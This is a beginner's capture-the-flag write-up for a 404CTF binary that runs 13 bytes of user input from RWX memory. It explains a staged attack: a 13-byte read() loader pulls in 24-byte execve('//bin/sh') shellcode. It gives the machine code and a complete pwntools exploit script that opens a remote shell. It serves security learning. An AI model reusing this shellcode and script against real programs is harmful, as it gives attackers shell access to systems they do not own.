TL;DR

RWX memory + 13-byte size limit = staged shellcode time! Upload a tiny loader (13 bytes) that reads a bigger shellcode (24 bytes), then execute it to get a shell 🚀

Challenge Files: chall (ELF binary)


Note: This is one of my first CTF writeups! At the time I solved this challenge, I was just starting out with pwn. There are probably cleaner/simpler ways to solve this, but this approach worked for me. If you spot improvements, feel free to share! 🙂


Challenge Overview

We’re given a “Firmware Updater v1.0” for a “space core”.

The program has 3 options:

1. Upload an update      <- Our entry point
2. Run the firmware      <- Executes our code
3. Open a bidirectional connection  <- Just exits

Binary Protections

Let’s check what we’re dealing with:

$ checksec chall
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

What this means:

  • ✅ NX enabled - Stack isn’t executable (doesn’t matter, we have RWX mmap!)
  • ✅ PIE enabled - Addresses are randomized (also doesn’t matter for us)
  • ❌ No canary - Stack overflow protection disabled
  • ⚠️ Partial RELRO - GOT is writable

But here’s the thing: none of this matters because the program literally gives us RWX memory and executes whatever we send! The protections are meaningless when there’s a deliberate code execution feature. 😎

Source Code Analysis

Let’s look at the juicy parts:

long firmware_max_size = 0xd; // Only 13 bytes!
void *firmware;

// Allocate RWX memory - the good stuff
firmware = mmap(NULL, 0x1000, 
                PROT_READ | PROT_WRITE | PROT_EXEC, 
                MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

The program allocates 4KB (0x1000 bytes) with RWX permissions - read, write, AND execute. That’s shellcode heaven! But there’s a catch…

void upload_update(long firmware_max_size, void* firmware) {
   printf("Ready to receive update > ");
   bytes_read = read(0, firmware, firmware_max_size);
}

void apply_update(void* firmware) {
   ((void (*)())firmware)();  // Cast and execute!
}

The problem: We can only upload 13 bytes (0xd), but a typical execve("/bin/sh") shellcode needs 20-30 bytes (the one used here is 24). Houston, we have a problem! 🚨

The Solution: Staged Shellcode

Since we can’t fit everything in 13 bytes, we’ll use a two-stage approach:

  1. Stage 1 (13 bytes): A tiny loader that reads more data
  2. Stage 2 (24 bytes): The actual execve shellcode

Think of it like a rocket: Stage 1 gets us into orbit, Stage 2 takes us to the moon! 🌙

Stage 1: The Loader (13 bytes)

This shellcode reads additional bytes from stdin and stores them right after itself:

lea rsi, [rdi+0xd]   ; Calculate where to write (firmware + 13)
xor edi, edi         ; fd = 0 (stdin)
xor eax, eax         ; syscall number 0 (read)
push 0x18            ; Length to read (24 bytes)
pop rdx              ; rdx = 24 (size)
syscall              ; Call read(0, firmware+13, 24)

Machine code: \x48\x8d\x77\x0d\x31\xff\x31\xc0\x6a\x18\x5a\x0f\x05

How it works:

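  1. When our firmware gets called, rdi still holds the firmware address: it was apply_update()'s first argument, and the call through the function pointer passes no arguments of its own, so in this binary nothing overwrites it
  2. lea rsi, [rdi+0xd] calculates the address right after our 13-byte shellcode
  3. The remaining instructions set rdi = 0, rax = 0 and rdx = 24, which gives the read(0, firmware+13, 24) syscall
  4. syscall is the last instruction of Stage 1, so when read() returns, execution continues at firmware+13, right into Stage 2!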
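
The register setup above can be traced in plain Python. This is only a model of the register writes, not real execution, and FIRMWARE is a made-up placeholder address (the real one is picked by mmap at run time):

```python
# Model of the registers Stage 1 touches. FIRMWARE is a hypothetical address;
# the real mapping address is chosen by mmap at run time.
FIRMWARE = 0x7F0000001000
STAGE1_LEN = 0xD

# State on entry: rdi still holds the firmware pointer, rax is arbitrary.
regs = {"rax": 0xDEADBEEF, "rdi": FIRMWARE, "rsi": 0, "rdx": 0}

regs["rsi"] = regs["rdi"] + STAGE1_LEN  # lea rsi, [rdi+0xd]
regs["rdi"] = 0                         # xor edi, edi (zero-extends into rdi)
regs["rax"] = 0                         # xor eax, eax (zero-extends into rax)
regs["rdx"] = 0x18                      # push 0x18 ; pop rdx

# x86-64 Linux syscall convention: number in rax, arguments in rdi, rsi, rdx.
SYSCALLS = {0: "read", 59: "execve"}
name = SYSCALLS[regs["rax"]]
call = (name, regs["rdi"], regs["rsi"] - FIRMWARE, regs["rdx"])
print(call)  # ('read', 0, 13, 24), i.e. read(0, firmware+13, 24)
```

The second tuple element is the fd, the third is the destination expressed as an offset from the firmware base, and the fourth is the length.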

Stage 2: The Shell (24 bytes)

This is a classic execve("/bin/sh") shellcode:

xor rsi, rsi                      ; rsi = NULL (argv)
push rsi                          ; Push NULL (string terminator)
mov rdi, 0x68732f6e69622f2f       ; Load "//bin/sh" (little-endian)
push rdi                          ; Push "//bin/sh" onto stack
push rsp                          ; Push address of string
pop rdi                           ; rdi = address of "//bin/sh"
xor rdx, rdx                      ; rdx = NULL (envp)
mov al, 0x3b                      ; syscall 59 (execve); upper bits of rax are 0 because read() returned 24
syscall                           ; Call execve("//bin/sh", NULL, NULL)

Machine code: \x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\xb0\x3b\x0f\x05
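
Two details of Stage 2 can be double-checked with a few lines of standard-library Python: that the 64-bit immediate really spells //bin/sh in memory, and that writing only al is enough to select execve. The second check assumes Stage 1's read() returned all 24 bytes in one call, so rax is 24 when Stage 2 starts:

```python
import struct

# The immediate from `mov rdi, 0x68732f6e69622f2f`; `push rdi` stores it
# little-endian, which gives these 8 bytes on the stack.
imm = 0x68732F6E69622F2F
on_stack = struct.pack("<Q", imm)
print(on_stack)  # b'//bin/sh'

# After Stage 1's read(), rax holds the byte count (assumed to be 24 here).
rax = 24
# `mov al, 0x3b` replaces only the low 8 bits of rax.
rax = (rax & ~0xFF) | 0x3B
print(rax)  # 59, the execve syscall number
```

If the read had returned a negative error code instead, the upper bits of rax would not be zero and the mov al shortcut would pick the wrong syscall.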

Exploitation Flow

Here’s how the magic happens:

┌──────────────┐
│ 1. Upload    │  Send Stage 1 (13 bytes)
│    Update    │
└──────┬───────┘
       │
       ▼
┌──────────────┐
│ 2. Run       │  Execute Stage 1
│    Firmware  │
└──────┬───────┘
       │
       ▼
┌──────────────┐
│ Stage 1      │  Calls read() to get more data
│ executing... │  Reads 24 more bytes
└──────┬───────┘
       │
       ▼
┌──────────────┐
│ Send Stage 2 │  Our execve shellcode
│ (24 bytes)   │
└──────┬───────┘
       │
       ▼
┌──────────────┐
│ Stage 2      │  Spawns /bin/sh
│ executing... │
└──────┬───────┘
       │
       ▼
    🐚 SHELL!

Memory Layout

Before exploitation:

┌──────────────────────────────────────┐
│ firmware address (0x1000 bytes)      │
│ Permissions: RWX                     │
│ Empty...                             │
└──────────────────────────────────────┘

After uploading Stage 1:

┌──────────────────────────────────────┐
│ Stage 1 (13 bytes)                   │
├──────────────────────────────────────┤
│ Empty...                             │
└──────────────────────────────────────┘

After Stage 1 executes:

┌──────────────────────────────────────┐
│ Stage 1 (13 bytes)                   │
├──────────────────────────────────────┤
│ Stage 2 (24 bytes) ← Just loaded!    │
├──────────────────────────────────────┤
│ Empty...                             │
└──────────────────────────────────────┘
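
The same layout can be modelled with a bytearray standing in for the RWX page. Nothing is executed here; it is just a sketch to confirm that the byte following Stage 1's syscall is the first byte of Stage 2:

```python
# Model the 0x1000-byte RWX mapping as a bytearray (no code is executed).
stage1 = bytes.fromhex("488d770d31ff31c06a185a0f05")
stage2 = bytes.fromhex("4831f65648bf2f2f62696e2f736857545f4831d2b03b0f05")

firmware = bytearray(0x1000)

# Menu option 1: read(0, firmware, 0xd) copies Stage 1 to offset 0.
firmware[0:len(stage1)] = stage1

# Stage 1's read(0, firmware+13, 24) copies Stage 2 right behind it.
dest = 0xD
firmware[dest:dest + len(stage2)] = stage2

# `syscall` is the last 2 bytes of Stage 1, so the next instruction fetched
# after it sits at offset 13, which is the first byte of Stage 2.
next_ip = len(stage1)
print(next_ip == dest, firmware[next_ip:next_ip + 3].hex())  # True 4831f6
```

4831f6 is the encoding of xor rsi, rsi, the first instruction of Stage 2.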

Exploit Script

from pwn import *

# Connect to target (PORT is a placeholder: use the port shown on the challenge page)
io = remote('challenges.404ctf.fr', PORT)
# or for local: io = process('./chall')

# Stage 1: Tiny loader (13 bytes)
stage1 = b"\x48\x8d\x77\x0d"  # lea rsi, [rdi+0xd]
stage1 += b"\x31\xff"          # xor edi, edi
stage1 += b"\x31\xc0"          # xor eax, eax
stage1 += b"\x6a\x18"          # push 0x18
stage1 += b"\x5a"              # pop rdx
stage1 += b"\x0f\x05"          # syscall

log.info(f"Stage 1 size: {len(stage1)} bytes")

# Stage 2: execve("/bin/sh") (24 bytes)
stage2 = b"\x48\x31\xf6"                          # xor rsi, rsi
stage2 += b"\x56"                                  # push rsi
stage2 += b"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68"  # mov rdi, "//bin/sh"
stage2 += b"\x57"                                  # push rdi
stage2 += b"\x54"                                  # push rsp
stage2 += b"\x5f"                                  # pop rdi
stage2 += b"\x48\x31\xd2"                          # xor rdx, rdx
stage2 += b"\xb0\x3b"                              # mov al, 0x3b
stage2 += b"\x0f\x05"                              # syscall

log.info(f"Stage 2 size: {len(stage2)} bytes")

# Step 1: Upload Stage 1
io.sendlineafter(b'> ', b'1')
io.sendafter(b'> ', stage1)

# Step 2: Execute firmware (Stage 1 runs and waits for input)
io.sendlineafter(b'> ', b'2')

# Step 3: Stage 1 is now waiting on read() - send Stage 2!
io.send(stage2)

# Get shell!
io.interactive()

Key Technical Points

1. The ModR/M Byte Matters!

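A common mistake: using lea rsp, [rdi+0xd] instead of lea rsi, [rdi+0xd]. The two encodings differ only in the ModR/M byte (0x77 selects rsi as the destination, 0x67 selects rsp), so a one-character slip in the machine code corrupts the stack pointer instead of setting up our destination address. Always double-check your assembly! 🔍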
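
To see where the register hides in the encoding, here is a small decoder sketch for the ModR/M byte. It is deliberately simplified: it ignores the REX extension bits and the SIB special case, neither of which matters for the two bytes compared here. The helper name decode_modrm is my own:

```python
# Register names for the 3-bit reg/rm fields (no REX.R / REX.B extension).
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]

def decode_modrm(byte):
    """Split a ModR/M byte into its mod, reg and rm fields."""
    mod = byte >> 6            # top 2 bits: addressing mode (1 = [reg + disp8])
    reg = (byte >> 3) & 0b111  # middle 3 bits: destination register for lea
    rm = byte & 0b111          # low 3 bits: base register of the memory operand
    return mod, REG64[reg], REG64[rm]

# 48 8d 77 0d: ModR/M byte 0x77
print(decode_modrm(0x77))  # (1, 'rsi', 'rdi') -> lea rsi, [rdi+0xd]
# 48 8d 67 0d: ModR/M byte 0x67, a single bit away
print(decode_modrm(0x67))  # (1, 'rsp', 'rdi') -> lea rsp, [rdi+0xd]
```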

2. Why Staged Shellcode?

This technique is super common in real exploits:

  • It works when the initial space is limited (buffer size restrictions)
  • Tools like Metasploit use it (a small stager that loads a larger stage)
  • It allows complex payloads despite space constraints

3. Direct Syscalls

We use raw syscalls instead of libc functions for:

  • Smaller code size
  • Compatibility: the same bytes work no matter which libc the target ships
  • No dependency on libc addresses, which are randomized and which we never leak

4. The “/bin/sh” String

We use //bin/sh (8 bytes) instead of /bin/sh (7 bytes) because it fits perfectly in a 64-bit register. The extra / doesn’t hurt - Linux treats // like /.
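
A quick sanity check of both claims, runnable on a Linux box (the samefile call asks the OS whether the two paths resolve to the same directory):

```python
import os

short, padded = b"/bin/sh", b"//bin/sh"
# Only the padded form fills all 8 bytes of a 64-bit register.
print(len(short), len(padded))  # 7 8

# On Linux, a leading "//" resolves to the same root directory as "/".
same_root = os.path.samefile("//", "/")
print(same_root)
```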

Lessons Learned

Exploitation techniques:

  1. Staged payloads - When space is limited, load a small loader first
  2. RWX memory abuse - If you can write and execute, game over
  3. Register conventions - Understanding calling conventions (rdi = first arg)
  4. Shellcode optimization - Every byte counts when space is tight
  5. Stack manipulation - Building strings on the stack for execve

Flag

404CTF{wh3n_l1fe_91ve5_you_LeMOn...}
